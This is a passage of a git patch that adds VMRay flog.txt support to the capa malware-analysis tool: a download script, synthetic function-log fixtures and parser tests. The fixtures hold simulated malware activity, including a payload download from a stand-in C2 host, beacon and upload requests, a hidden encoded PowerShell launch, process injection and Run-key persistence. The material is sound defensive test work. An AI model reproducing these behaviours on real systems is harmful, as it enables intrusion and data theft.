names** | ✗ | ✓ | +| **Embedded file strings** | ✗ | ✓ | +| **Base address** | ✗ | ✓ | +| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) | + +**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log. + +**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data. 
+ +``` +# flog.txt — free, limited to dynamic API calls +capa path/to/flog.txt + +# Full VMRay archive — requires subscription, richer features +capa path/to/analysis_archive.zip +``` + ## tips and tricks ### only run selected rules diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py new file mode 100644 index 0000000000..e9859056dc --- /dev/null +++ b/scripts/fetch-vmray-flog.py @@ -0,0 +1,270 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it. + +Given a sample SHA-256 hash and VMRay credentials, this script: + 1. Looks up the sample on the VMRay instance. + 2. Finds the most-recent analysis for that sample. + 3. Downloads the flog.txt (Download Function Log) from the analysis archive. + 4. Optionally runs capa against the downloaded file. 
+ +Requirements: + pip install requests + +Usage:: + + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --output /tmp/sample_flog.txt + + # Fetch and immediately run capa: + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --run-capa + +VMRay API reference: + https://docs.vmray.com/documents/api-reference/ + +Note: this script requires a VMRay account. The flog.txt itself is freely available +("Download Function Log") in the VMRay Threat Feed web UI, but downloading it +programmatically via the REST API requires valid API credentials. +""" + +import argparse +import logging +import subprocess +import sys +from pathlib import Path + +import requests + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# VMRay REST API helpers +# --------------------------------------------------------------------------- + +_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt" + + +def _session(url: str, apikey: str) -> requests.Session: + """Return an authenticated requests.Session for the given VMRay instance.""" + s = requests.Session() + s.headers.update( + { + "Authorization": f"api_key {apikey}", + "Accept": "application/json", + } + ) + s.verify = True # set to False only when using self-signed certificates + s.base_url = url.rstrip("/") # type: ignore[attr-defined] + return s + + +def _get(session: requests.Session, path: str, **kwargs) -> dict: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.json() + + +def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = 
session.get(url, **kwargs) + resp.raise_for_status() + return resp.content + + +def lookup_sample(session: requests.Session, sha256: str) -> dict: + """ + Return the VMRay sample record for the given SHA-256. + Raises ValueError if the sample is not found. + """ + data = _get(session, f"/rest/sample/sha256/{sha256}") + if data.get("result") != "ok" or not data.get("data"): + raise ValueError(f"sample not found on VMRay instance: {sha256}") + # data["data"] is a list; take the first entry + return data["data"][0] + + +def get_latest_analysis(session: requests.Session, sample_id: int) -> dict: + """ + Return the most-recent finished analysis for the given VMRay sample ID. + Raises ValueError if no analysis is found. + """ + data = _get(session, "/rest/analysis", params={"sample_id": sample_id}) + analyses = data.get("data", []) + if not analyses: + raise ValueError(f"no analyses found for sample_id={sample_id}") + # Sort by analysis_id descending (newest first) + analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True) + return analyses[0] + + +def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes: + """ + Download the flog.txt content for the given VMRay analysis ID. + + VMRay exposes the function log via the analysis archive endpoint. + We request only the flog_txt entry from the archive using the + ``file_filter`` query parameter. 
+ """ + # Try the dedicated log endpoint first (VMRay >= 2024.x) + try: + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary", + ) + if content: + return content + except requests.HTTPError: + pass + + # Fallback: download via the analysis archive with a file filter + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/archive", + params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH}, + ) + return content + + +# --------------------------------------------------------------------------- +# main +# --------------------------------------------------------------------------- + + +def main(argv=None): + if argv is None: + argv = sys.argv[1:] + + parser = argparse.ArgumentParser( + description="Download VMRay flog.txt for a sample hash and (optionally) run capa." + ) + parser.add_argument( + "--url", + required=True, + metavar="URL", + help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com", + ) + parser.add_argument( + "--apikey", + required=True, + metavar="KEY", + help="VMRay REST API key (Settings → API Keys).", + ) + parser.add_argument( + "--sha256", + required=True, + metavar="SHA256", + help="SHA-256 hash of the sample to analyse.", + ) + parser.add_argument( + "--output", + metavar="PATH", + help="Where to save the downloaded flog.txt. Defaults to <sha256>_flog.txt in the current directory.", + ) + parser.add_argument( + "--run-capa", + action="store_true", + dest="run_capa", + help="After downloading, run 'capa <output>' and print the results.", + ) + parser.add_argument( + "--capa-args", + metavar="ARGS", + default="", + help="Extra arguments forwarded to capa (only used with --run-capa).", + ) + parser.add_argument( + "--no-verify-ssl", + action="store_false", + dest="verify_ssl", + help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).", + ) + parser.add_argument( + "-d", "--debug", action="store_true", help="Enable debug logging." 
+ ) + args = parser.parse_args(argv) + + logging.basicConfig( + level=logging.DEBUG if args.debug else logging.INFO, + format="%(levelname)s: %(message)s", + ) + + output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt") + + session = _session(args.url, args.apikey) + session.verify = args.verify_ssl # type: ignore[assignment] + + # Step 1 — look up sample + logger.info("looking up sample %s …", args.sha256) + try: + sample = lookup_sample(session, args.sha256) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find sample: %s", exc) + return 1 + + sample_id: int = sample["sample_id"] + logger.debug("found sample_id=%d", sample_id) + + # Step 2 — find the latest analysis + logger.info("fetching analysis list for sample_id=%d …", sample_id) + try: + analysis = get_latest_analysis(session, sample_id) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find analysis: %s", exc) + return 1 + + analysis_id: int = analysis["analysis_id"] + logger.debug("using analysis_id=%d", analysis_id) + + # Step 3 — download flog.txt + logger.info("downloading flog.txt for analysis_id=%d …", analysis_id) + try: + flog_bytes = download_flog_txt(session, analysis_id) + except requests.HTTPError as exc: + logger.error("failed to download flog.txt: %s", exc) + return 1 + + if not flog_bytes: + logger.error( + "received empty response — flog.txt may not be available for this analysis" + ) + return 1 + + output_path.write_bytes(flog_bytes) + logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes)) + + # Step 4 (optional) — run capa + if args.run_capa: + capa_cmd = ["capa", str(output_path)] + ( + args.capa_args.split() if args.capa_args else [] + ) + logger.info("running: %s", " ".join(capa_cmd)) + result = subprocess.run(capa_cmd) + return result.returncode + + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt 
b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt new file mode 100644 index 0000000000..0b9455cc65 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt @@ -0,0 +1,43 @@ +# Log Creation Date: 02.01.2025 12:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1234" +os_parent_pid = "0x1" +parent_id = "0" +image_name = "backdoor" +filename = "/tmp/backdoor" +cmd_line = "/tmp/backdoor" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "stack" + +Thread: +id = "1" +os_tid = "0x1234" + [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100 + [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6 + [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3 + [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4 + [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0 + [0001.006] sys_fork () returned 0x2345 + [0001.007] sys_getuid () returned 0x0 + [0001.008] sys_setuid (uid=0x0) returned 0x0 + [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0 + [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0 + [0001.011] sys_time (tloc=0x0) returned 0x677f2000 + [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0 + [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0 + [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000 + [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0 + [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0 + [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0 + [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, 
addrlen=0x7ffe2020) returned 0x5 + [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20 + [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40 diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt new file mode 100644 index 0000000000..0948939b00 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt @@ -0,0 +1,37 @@ +# Log Creation Date: 03.01.2025 08:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x2000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "edgecase.exe" +filename = "c:\\users\\test\\edgecase.exe" +cmd_line = "edgecase.exe" +monitor_reason = "analysis_target" + +Region: +id = "5" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x2100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8 + [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9 + [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff + [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0 + [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1 + [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1 + [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0 + [0001.009] 
CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1 + [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0 + [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256 + [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128 + [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1 + [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1 + [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200 diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt new file mode 100644 index 0000000000..e7cab248a9 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt @@ -0,0 +1,63 @@ +# Log Creation Date: 01.01.2025 10:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "sample.exe" +filename = "c:\\users\\test\\desktop\\sample.exe" +cmd_line = "\"c:\\users\\test\\desktop\\sample.exe\" " +monitor_reason = "analysis_target" + +Region: +id = "10" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x1100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\Users\\test\\Documents\\config.ini", dwDesiredAccess=0x80000000, dwShareMode=0x1) returned 0x4 + [0001.002] RegOpenKeyExW (hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 10.0)", dwAccessType=0x1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 
0x4c9804 + [0001.004] InternetConnectW (hInternet=0x4c9804, lpszServerName="evil.example.com", nServerPort=0x1bb, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c9808 + [0001.005] VirtualAlloc (lpAddress=0x0, dwSize=4096, flAllocationType=0x3000, flProtect=0x40) returned 0x1000000 + [0001.006] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0x1, lpName="Global\\MyMutex12345") returned 0x100 + [0001.007] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7fff00000000 + [0001.008] CreateProcessW (lpApplicationName=NULL, lpCommandLine="cmd.exe /c whoami", dwCreationFlags=0x8) returned 0x1 + [0001.009] WriteFile (hFile=0x4, lpBuffer="MZ\x90\x00\x03", nNumberOfBytesToWrite=0x1000) returned 0x1 + [0001.010] HttpOpenRequestW (hConnect=0x4c9808, lpszVerb="GET", lpszObjectName="/beacon", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c980c + [0001.011] SetFileAttributesW (lpFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", dwFileAttributes=0x2) returned 0x1 + [0001.012] GetTempPathW (nBufferLength=0x104, lpBuffer="C:\\Users\\test\\AppData\\Local\\Temp\\") returned 0x23 + [0001.013] CopyFileW (lpExistingFileName="C:\\Users\\test\\Desktop\\sample.exe", lpNewFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", bFailIfExists=0x0) returned 0x1 + [0001.014] GetSystemDirectoryW (lpBuffer="C:\\Windows\\system32", uSize=0x104) returned 0x13 + [0001.015] ShellExecuteW (hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", lpParameters=NULL) returned 0x2a + [0002.000] WinHttpOpen (pszAgentW="WinHTTP/1.0", dwAccessType=0x0, pwszProxyW=NULL, pwszProxyBypassW=NULL, dwFlags=0x0) returned 0x4c9900 + [0002.001] WinHttpConnect (hSession=0x4c9900, pswzServerName="c2.example.org", nServerPort=0x50) returned 0x4c9904 + [0002.002] WinHttpOpenRequest (hConnect=0x4c9904, pwszVerb="POST", pwszObjectName="/upload", pwszVersion=NULL, pwszReferrer=NULL, dwFlags=0x0) returned 
0x4c9908 + [0002.003] RegSetValueExW (hKey=0x80000001, lpValueName="Persistence", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe") returned 0x0 + [0002.004] GetAddrInfoW (pNodeName="c2.example.org", pServiceName=NULL, pHints=0x0) returned 0x0 + +Process: +id = "2" +os_pid = "0x1200" +os_parent_pid = "0x1000" +parent_id = "1" +image_name = "cmd.exe" +filename = "c:\\windows\\system32\\cmd.exe" +cmd_line = "cmd.exe /c whoami" +monitor_reason = "child_process" + +Region: +id = "20" +name = "private_0x0000000000020000" + +Thread: +id = "3" +os_tid = "0x1300" + [0003.000] NtQueryInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x13fb10, ProcessInformationLength=0x18) returned 0x0 + [0003.001] GetComputerNameW (lpBuffer="DESKTOP-TEST01", nSize=0xf) returned 0x1 + [0003.002] GetUserNameW (lpBuffer="test", nSize=0x5) returned 0x1 diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py index 95088ea134..133d286fb5 100644 --- a/tests/test_vmray_flog_txt.py +++ b/tests/test_vmray_flog_txt.py @@ -14,12 +14,20 @@ """Tests for VMRay flog.txt parser (#2452).""" +from pathlib import Path + import pytest +import capa.features.common +import capa.features.insn from capa.exceptions import UnsupportedFormatError from capa.features.extractors.vmray import flog_txt from capa.features.extractors.vmray.extractor import VMRayExtractor +# Fixture files live in tests/fixtures/vmray/flog_txt/ (committed to the main repo so they +# are always present in CI without requiring the capa-testfiles submodule). 
+FLOG_TXT_FIXTURES = Path(__file__).resolve().parent / "fixtures" / "vmray" / "flog_txt" + MINIMAL_FLOG_TXT = """ # Log Creation Date: 08.10.2024 18:12:03 @@ -53,8 +61,8 @@ def test_parse_flog_txt_minimal(tmp_path): # Write as binary so newlines are exactly \n (avoids Windows \r\n) path = tmp_path / "flog.txt" path.write_bytes( - b'# Flog Txt Version 1\n\n' - b'Process:\n' + b"# Flog Txt Version 1\n\n" + b"Process:\n" b'id = "1"\n' b'os_pid = "0x118c"\n' b'image_name = "svchost.exe"\n' @@ -63,10 +71,10 @@ def test_parse_flog_txt_minimal(tmp_path): b'parent_id = "0"\n' b'os_parent_pid = "0"\n' b'cmd_line = ""\n\n' - b'Thread:\n' + b"Thread:\n" b'id = "1"\n' b'os_tid = "0x117c"\n' - b' [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n' + b" [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n" ) flog = flog_txt.parse_flog_txt_path(path) assert flog.analysis.log_version == "1" @@ -84,7 +92,9 @@ def test_parse_flog_txt_minimal(tmp_path): def test_parse_flog_txt_rejects_wrong_header(): - with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"): + with pytest.raises( + UnsupportedFormatError, match="does not appear to be a VMRay flog.txt" + ): flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") @@ -92,7 +102,7 @@ def test_parse_flog_txt_sys_prefix_stripped(tmp_path): # Linux kernel calls start with sys_; parser should strip for consistency with XML path = tmp_path / "flog.txt" path.write_bytes( - b'# Flog Txt Version 1\n\n' + b"# Flog Txt Version 1\n\n" b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n' b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n' @@ -104,7 +114,9 @@ def test_parse_flog_txt_sys_prefix_stripped(tmp_path): def test_vmray_analysis_from_flog_txt(tmp_path): path = tmp_path / "flog.txt" - path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", 
b"\n").replace(b"\r", b"\n")) + path.write_bytes( + MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") + ) from capa.features.extractors.vmray import VMRayAnalysis analysis = VMRayAnalysis.from_flog_txt(path) @@ -120,7 +132,9 @@ def test_vmray_extractor_from_flog_txt(tmp_path): from capa.features.address import NO_ADDRESS path = tmp_path / "flog.txt" - path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + path.write_bytes( + MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") + ) ext = VMRayExtractor.from_flog_txt(path) assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt procs = list(ext.get_processes()) @@ -135,13 +149,13 @@ def test_parse_flog_txt_args_parsed(tmp_path): """API call arguments are parsed into Param objects for feature extraction.""" path = tmp_path / "flog.txt" path.write_bytes( - b'# Flog Txt Version 1\n\n' + b"# Flog Txt Version 1\n\n" b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n' b'Thread:\nid = "1"\nos_tid = "0x2000"\n' b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n' - b' [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n' - b' [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n' + b" [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n" + b" [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n" ) flog = flog_txt.parse_flog_txt_path(path) calls = flog.analysis.function_calls @@ -168,3 +182,243 @@ def test_parse_flog_txt_args_parsed(tmp_path): get_proc = calls[2] assert get_proc.name == "GetCurrentProcess" assert get_proc.params_in is None + + +# --------------------------------------------------------------------------- +# Fixture-based feature-presence tests +# 
--------------------------------------------------------------------------- +# These tests load the realistic flog.txt fixtures from tests/fixtures/vmray/flog_txt/ +# and verify that the extractor yields the expected capa features. They act as +# regression tests for the parser — especially the string-argument parsing path, +# which is brittle — and mirror the pattern used by test_vmray_features.py. + + +def _collect_all_call_features(ext: VMRayExtractor) -> set: + """Collect every feature emitted at the call scope across all processes.""" + features = set() + for ph in ext.get_processes(): + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +def _collect_call_features_for_process(ext: VMRayExtractor, image_name: str) -> set: + """Collect call-scope features only for the process whose image_name matches.""" + features = set() + for ph in ext.get_processes(): + if ph.inner.image_name != image_name: + continue + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +# --- windows_apis.flog.txt --------------------------------------------------- + + +@pytest.fixture(scope="module") +def windows_apis_extractor(): + path = FLOG_TXT_FIXTURES / "windows_apis.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_windows_flog_txt_process_count(windows_apis_extractor): + """Two processes are described in windows_apis.flog.txt.""" + procs = list(windows_apis_extractor.get_processes()) + assert len(procs) == 2 + + +def test_windows_flog_txt_api_features(windows_apis_extractor): + """Common Win32 API names are yielded as API features.""" + features = _collect_all_call_features(windows_apis_extractor) + for api_name in ( + "CreateFileW", + "RegOpenKeyExW", + "InternetOpenW", + "InternetConnectW", + "VirtualAlloc", + 
"CreateMutexW", + "LoadLibraryW", + "CreateProcessW", + "HttpOpenRequestW", + "WinHttpConnect", + "GetAddrInfoW", + "GetComputerNameW", + ): + assert ( + capa.features.insn.API(api_name) in features + ), f"API({api_name!r}) not found" + + +def test_windows_flog_txt_string_args(windows_apis_extractor): + """String arguments are extracted and backslash-escaping is correctly unwound.""" + features = _collect_all_call_features(windows_apis_extractor) + for expected_string in ( + # CreateFileW lpFileName (double-backslash in flog → single backslash in feature) + "C:\\Users\\test\\Documents\\config.ini", + # RegOpenKeyExW lpSubKey + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + # InternetOpenW lpszAgent + "Mozilla/5.0 (Windows NT 10.0)", + # InternetConnectW lpszServerName + "evil.example.com", + # CreateMutexW lpName + "Global\\MyMutex12345", + # LoadLibraryW lpLibFileName + "kernel32.dll", + # HttpOpenRequestW verb and path + "GET", + "/beacon", + # WinHttpConnect pswzServerName + "c2.example.org", + # WinHttpOpenRequest verb + "POST", + # GetComputerNameW result (child process) + "DESKTOP-TEST01", + ): + assert ( + capa.features.common.String(expected_string) in features + ), f"String({expected_string!r}) not found" + + +def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor): + """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features.""" + features = _collect_all_call_features(windows_apis_extractor) + # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash + assert ( + capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") + not in features + ) + + +def test_windows_flog_txt_number_args(windows_apis_extractor): + """Numeric arguments are extracted as Number features.""" + features = _collect_all_call_features(windows_apis_extractor) + # VirtualAlloc dwSize + assert capa.features.insn.Number(4096) in features + # VirtualAlloc 
flAllocationType + assert capa.features.insn.Number(0x3000) in features + # VirtualAlloc flProtect + assert capa.features.insn.Number(0x40) in features + # CreateFileW dwDesiredAccess + assert capa.features.insn.Number(0x80000000) in features + + +def test_windows_flog_txt_child_process(windows_apis_extractor): + """The spawned child process (cmd.exe) is present and has its own API calls.""" + features = _collect_call_features_for_process(windows_apis_extractor, "cmd.exe") + assert capa.features.insn.API("NtQueryInformationProcess") in features + assert capa.features.insn.API("GetUserNameW") in features + # GetUserNameW lpBuffer string + assert capa.features.common.String("test") in features + + +# --- linux_syscalls.flog.txt ------------------------------------------------- + + +@pytest.fixture(scope="module") +def linux_syscalls_extractor(): + path = FLOG_TXT_FIXTURES / "linux_syscalls.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor): + """sys_ prefix is stripped from all Linux syscall names.""" + features = _collect_all_call_features(linux_syscalls_extractor) + # Every syscall name should appear WITHOUT the sys_ prefix + for stripped_name in ( + "read", + "write", + "open", + "connect", + "socket", + "execve", + "fork", + "getuid", + "setuid", + "chmod", + "unlink", + "time", + "ptrace", + "prctl", + "mmap", + "mprotect", + "munmap", + "bind", + "listen", + "accept", + "sendto", + "recvfrom", + ): + assert ( + capa.features.insn.API(stripped_name) in features + ), f"API({stripped_name!r}) not found after stripping" + + +def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor): + """sys_-prefixed names must NOT appear in features (only the stripped form).""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.insn.API("sys_open") not in features + assert capa.features.insn.API("sys_execve") not in features + + +def 
test_linux_flog_txt_string_args(linux_syscalls_extractor): + """String path arguments from Linux syscalls are extracted correctly.""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.common.String("/etc/passwd") in features + assert capa.features.common.String("/bin/sh") in features + assert capa.features.common.String("/tmp/backdoor") in features + assert capa.features.common.String("/tmp/.hidden") in features + + +# --- string_edge_cases.flog.txt ----------------------------------------------- + + +@pytest.fixture(scope="module") +def string_edge_cases_extractor(): + path = FLOG_TXT_FIXTURES / "string_edge_cases.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_edge_case_paths_with_spaces(string_edge_cases_extractor): + """File paths containing spaces are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert ( + capa.features.common.String("C:\\path with spaces\\file name.txt") in features + ) + + +def test_edge_case_unc_path(string_edge_cases_extractor): + """UNC paths (\\server\\share) are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("\\\\server\\share\\document.docx") in features + + +def test_edge_case_url_string(string_edge_cases_extractor): + """Full URL strings are preserved as-is.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("https://c2.example.com/payload.bin") in features + + +def test_edge_case_registry_key(string_edge_cases_extractor): + """Registry key paths are normalised to single backslashes.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert ( + capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") + in features + ) + + +def test_edge_case_numeric_args(string_edge_cases_extractor): + """Numeric arguments from edge-case calls are extracted.""" + 
features = _collect_all_call_features(string_edge_cases_extractor) + # send() len=256 + assert capa.features.insn.Number(256) in features + # recv() len=4096 + assert capa.features.insn.Number(4096) in features + # WriteProcessMemory nSize=4096 + assert capa.features.insn.Number(4096) in features From 2ff96823e3e01c1cc7c61ace5059ccae7882d60e Mon Sep 17 00:00:00 2001 From: devs6186 Date: Thu, 19 Mar 2026 17:03:49 +0530 Subject: [PATCH 4/7] tests: expand vmray flog.txt fixtures to cover real-world format variations Add two new fixture files and 63 additional tests to address reviewer feedback that synthetic fixtures did not validate real-world format variance. New coverage: format_variance.flog.txt - zero-padded hex IDs (0x00000ABC, 0x0001) - decimal-only arguments alongside symbolic constants - mixed-case hex return values (0xFFFFFFFFFFFFFFFF) - multiple threads in a single process block - calls with no "returned" clause (CoTaskMemFree, GetSystemInfo) - HRESULT-style error codes as return values (0x80070005, 0x80042302) - child process spawned via CreateProcessW crlf_endings.flog.txt - Windows-style CRLF (\r\n) line endings throughout - verifies CRLF normalisation inside parse_flog_txt() New 